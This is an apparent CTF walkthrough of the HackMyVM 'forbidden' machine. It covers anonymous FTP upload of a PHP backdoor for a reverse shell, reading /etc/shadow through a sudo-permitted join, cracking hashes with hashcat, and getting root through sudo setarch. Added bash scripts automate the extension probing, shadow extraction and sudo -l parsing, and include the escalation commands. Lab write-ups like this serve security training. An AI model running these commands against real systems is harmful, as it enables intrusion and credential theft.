HackmyVM: forbidden write-up

Vishal
3 min read · Nov 29, 2022

Let's solve "forbidden", a boot-to-root machine from HackMyVM.

Find the open ports using nmap.

[Screenshot: nmap scan to find all open ports]

Anonymous FTP login is allowed.

[Screenshot: nmap showing anonymous FTP login is allowed]

I logged in to FTP with the anonymous account and found three files: index.html, note.txt and robots.txt.

[Screenshot: contents of index.html]
[Screenshot: contents of note.txt]

The same three files show up during web enumeration with gobuster, so the anonymous FTP directory is the web root. Since the anonymous account can also write there, anything we upload over FTP is served by the web server.

[Screenshot: gobuster showing index.html, robots.txt and note.txt]

I first uploaded a PHP backdoor with a .php extension, but when I requested it in the browser the server did not execute it, so no reverse shell. The .php3 extension did not work either. A backdoor uploaded with a .php5 extension was executed, which is what worked for me. Which extensions are handed to the PHP interpreter is decided by the web server's handler configuration, so it is worth probing several (.php5, .phtml, .phar and so on) rather than giving up after .php.
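The extension-probing step above can be scripted instead of done by hand. The following is an added example, not code from the original write-up: it uploads a tiny marker script through anonymous FTP for each candidate extension, fetches it over HTTP, and reports whether the server executed it or served the source back. It assumes anonymous FTP write into the web root, HTTP on port 80, a placeholder target address in TARGET, and a harmless marker script rather than a backdoor. Network access only happens when PROBE_RUN=1 is set, so the classification logic can be exercised offline.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): find out which PHP-style
# extensions the target web server executes.
# Assumptions: FTP root == web root, anonymous write allowed, HTTP on :80,
# TARGET is a placeholder address.
set -u

TARGET="${TARGET:-10.10.10.10}"                       # assumed target address
EXTENSIONS="${EXTENSIONS:-php php3 php4 php5 phtml phar}"
MARKER='PROBE-OK'

# The marker is built from two string literals, so the raw PHP source never
# contains "PROBE-OK"; only an executed script produces it.
PROBE_SRC='<?php echo "PROBE-" . "OK"; ?>'

# classify_body BODY
# "executed": the interpreter ran the script and emitted the marker
# "raw":      the server served the PHP source as plain text (no handler)
# "unknown":  anything else (404, 403, directory listing, ...)
classify_body() {
  case "$1" in
    *'<?php'*)   echo raw ;;
    *"$MARKER"*) echo executed ;;
    *)           echo unknown ;;
  esac
}

# probe_ext EXT: upload probe.EXT via FTP, request it over HTTP, classify.
probe_ext() {
  local ext="$1" name="probe.$1" body
  printf '%s' "$PROBE_SRC" |
    curl -s -T - --user anonymous:anonymous "ftp://$TARGET/$name"
  body="$(curl -s "http://$TARGET/$name")"
  printf '%-6s %s\n' "$ext" "$(classify_body "$body")"
}

# Only touch the network when explicitly asked.
if [ "${PROBE_RUN:-0}" = 1 ]; then
  for ext in $EXTENSIONS; do probe_ext "$ext"; done
fi
```

Run it as `PROBE_RUN=1 TARGET=<ip> bash probe.sh`; an extension reported as "executed" is the one to use for the real payload. Remember to delete the probe files from the web root afterwards.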

I started a netcat listener on my machine, requested the uploaded file, and got the reverse shell.

[Screenshot: payload to get the reverse shell]
[Screenshot: obtained the reverse shell on kali]

From index.html we have a potential username, "marta", and note.txt mentions image files that might contain the user's password. So I searched the machine for .jpg files and found one called "TOPSECRETIMAGE.jpg".

I transferred this image to my local machine using nc.

I ran exiftool on it to look for hidden metadata and also ran strings over it, but neither turned up anything useful. After some time I tried the image's name as the password for marta, and it worked.

[Screenshot: able to switch user to marta]

I used sudo -l to see what marta is allowed to run on the system.

[Screenshot: sudo -l result for marta user]

marta can run join as root. According to GTFOBins, join can be used to read arbitrary files, so let's use it to read /etc/shadow.

[Screenshot: reading /etc/shadow using join command]

Let's copy the hashes to the local machine and use hashcat with rockyou.txt to crack them.
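The two steps above (reading /etc/shadow through join, then feeding the hashes to hashcat) are the kind of thing worth scripting once and reusing. The following is an added example, not code from the original write-up. It wraps the GTFOBins join file-read primitive in a function, filters the shadow entries down to the ones that actually carry a crypt hash, and maps each hash prefix to the hashcat mode it needs. The shadow file embedded below is constructed with placeholder hashes so the functions can be exercised offline; on the target, the join call is prefixed with sudo.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): read a root-only file via a
# sudo-able join(1), then extract hashcat-ready entries from it.
set -u

# read_via_join FILE
# With an empty first input and -a 2, join prints every line of FILE that has
# no match, i.e. every line. For a colon-separated, whitespace-free file such
# as /etc/shadow that is the line verbatim. GTFOBins' form is
# "join -a 2 /dev/null FILE"; --nocheck-order is added here so GNU join does
# not complain (or exit non-zero) about unsorted input, which is irrelevant.
# On the target: sudo join -a 2 /dev/null /etc/shadow
read_via_join() {
  join --nocheck-order -a 2 /dev/null "$1"
}

# crackable_entries < shadow
# Keep user:hash for entries whose hash field is a real crypt hash ($id$...).
# Locked ("!", "*") or empty fields have nothing to crack and are dropped.
crackable_entries() {
  awk -F: '$2 ~ /^\$/ { print $1 ":" $2 }'
}

# hashcat_mode HASH: map the crypt prefix to hashcat's -m value.
hashcat_mode() {
  case "$1" in
    '$1$'*)        echo 500  ;;   # md5crypt
    '$5$'*)        echo 7400 ;;   # sha256crypt
    '$6$'*)        echo 1800 ;;   # sha512crypt
    '$2'[aby]'$'*) echo 3200 ;;   # bcrypt
    *)             echo unsupported ;;   # e.g. yescrypt ($y$): use john instead
  esac
}

# Constructed sample: placeholder hashes, not from any real machine.
SAMPLE_SHADOW="$(mktemp)"
trap 'rm -f "$SAMPLE_SHADOW"' EXIT
cat > "$SAMPLE_SHADOW" <<'EOF'
root:$6$saltsalt$placeholderhashroot:19325:0:99999:7:::
daemon:*:19325:0:99999:7:::
marta:!:19325:0:99999:7:::
peter:$6$othersalt$placeholderhashpeter:19325:0:99999:7:::
EOF

# Typical flow on the attacker box once hashes.txt holds the user:hash lines:
#   hashcat -m 1800 --username hashes.txt /usr/share/wordlists/rockyou.txt
#   hashcat -m 1800 --username --show hashes.txt
if [ "${SHOW_SAMPLE:-0}" = 1 ]; then
  read_via_join "$SAMPLE_SHADOW" | crackable_entries | while IFS=: read -r user hash; do
    printf '%s -m %s\n' "$user" "$(hashcat_mode "$hash")"
  done
fi
```

The `--username` flag lets hashcat consume `user:hash` lines directly, so the output of `crackable_entries` can be saved and passed in as-is; pick `-m` from the prefix of the hashes you actually extracted rather than assuming sha512crypt.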

[Screenshot: hashcat for cracking the hashes]

It recovers the password for peter.

[Screenshot: peter's password]
[Screenshot: switched to user peter]

sudo -l shows that peter can run setarch as root without a password.

According to GTFOBins, setarch can be used to run arbitrary commands, so launching a shell through it with sudo gives a root shell. Confirm with id afterwards.

[Screenshot: privilege escalation using setarch command]
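Both privilege escalations on this box (marta's join, peter's setarch) came straight out of `sudo -l`, so it helps to parse that output mechanically instead of eyeballing it. The following is an added example, not code from the original write-up: it turns `sudo -l` output into one line per allowed command (run-as user, whether a password is needed, the binary), and attaches the GTFOBins technique for the two binaries seen on this machine. The `sudo -l` text embedded below is constructed to exercise the parser; the second entry in it is made up and is not something the machine actually grants. The escalation itself only runs when ESCALATE=1 is set.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): parse sudo -l and map
# binaries to the GTFOBins techniques used in this write-up.
set -u

# parse_sudo_l < sudo-l-output
# Emits RUNAS<TAB>NOPASSWD|PASSWD<TAB>COMMAND for each command in lines of the
# form "(runas) [NOPASSWD:] /cmd1, /cmd2". Other sudo tags (SETENV: etc.) are
# not handled; this covers the common NOPASSWD case seen on this box.
parse_sudo_l() {
  awk '
    /^[[:space:]]*\(/ {
      line = $0
      sub(/^[[:space:]]*/, "", line)
      runas = line; sub(/\).*/, "", runas); sub(/^\(/, "", runas)
      sub(/^\([^)]*\)[[:space:]]*/, "", line)
      pw = "PASSWD"
      if (line ~ /^NOPASSWD:/) { pw = "NOPASSWD"; sub(/^NOPASSWD:[[:space:]]*/, "", line) }
      n = split(line, cmds, /,[[:space:]]*/)
      for (i = 1; i <= n; i++) printf "%s\t%s\t%s\n", runas, pw, cmds[i]
    }'
}

# gtfobins_hint BINARY: the technique this write-up used for each binary.
gtfobins_hint() {
  case "$(basename "$1")" in
    join)    echo 'file read: sudo join -a 2 /dev/null /etc/shadow' ;;
    setarch) echo 'shell: sudo setarch "$(arch)" /bin/sh' ;;
    *)       echo 'no hint here; check GTFOBins' ;;
  esac
}

# Constructed sudo -l output (hostname mirrors the box; second entry is made up
# purely to exercise comma-separated, password-required parsing).
SAMPLE_SUDO_L="$(cat <<'EOF'
Matching Defaults entries for peter on forbidden:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User peter may run the following commands on forbidden:
    (root) NOPASSWD: /usr/bin/setarch
    (ALL : ALL) /usr/bin/less, /usr/bin/nano
EOF
)"

# Print the parsed table with hints, e.g. when run on the target as:
#   sudo -l | bash -c 'source ./sudo_parse.sh; parse_sudo_l | show_hints'
show_hints() {
  while IFS="$(printf '\t')" read -r runas pw cmd; do
    printf '%-10s %-9s %-20s %s\n' "$runas" "$pw" "$cmd" "$(gtfobins_hint "$cmd")"
  done
}

# The actual escalation, exactly as GTFOBins gives it; only on the target.
if [ "${ESCALATE:-0}" = 1 ]; then
  sudo setarch "$(arch)" /bin/sh
fi
```

A NOPASSWD entry for a binary with a GTFOBins "sudo" page is the first thing to look at, but a PASSWD entry is just as good once you already have the user's password, as was the case for peter here.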
